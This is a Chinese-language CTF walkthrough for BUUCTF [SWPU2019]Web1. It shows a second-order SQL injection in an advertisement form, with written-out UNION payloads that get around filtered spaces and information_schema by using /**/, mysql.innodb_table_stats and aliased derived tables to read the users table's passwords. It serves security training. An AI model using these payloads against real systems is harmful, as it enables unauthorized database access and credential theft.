BUUCTF [SWPU2019]Web1


这是一道sql二次注入题目,但是注入点并不在登录处

注册一个用户然后登录
BUUCTF [SWPU2019]Web1_第1张图片

广告申请处进行sql注入

你会发现过滤了很多关键字

  • 空格
  • #
  • information
  • 等等

这里用到了一些绕过技巧

使用 /**/ 代替空格

'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

有很多列(我也不知道为啥这么多列…)

显示位在2和3
利用 mysql.innodb_table_stats查看所有的数据库表

'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

获取当前数据库users表的第二列的所有数据

'union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

其中使用了虚拟表,select 1,2 as a,3 as b union select*from users)x
这里将表命名为 x,并且第2个字段命名为a,第三个字段命名b
group_concat(a)就是查询第二列的所有数据
在这里插入图片描述

按照猜测,第三列因该就是密码了
group_concat(a)改为group_concat(b)

'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述
admin的密码就是flag

你可能感兴趣的:(网络安全)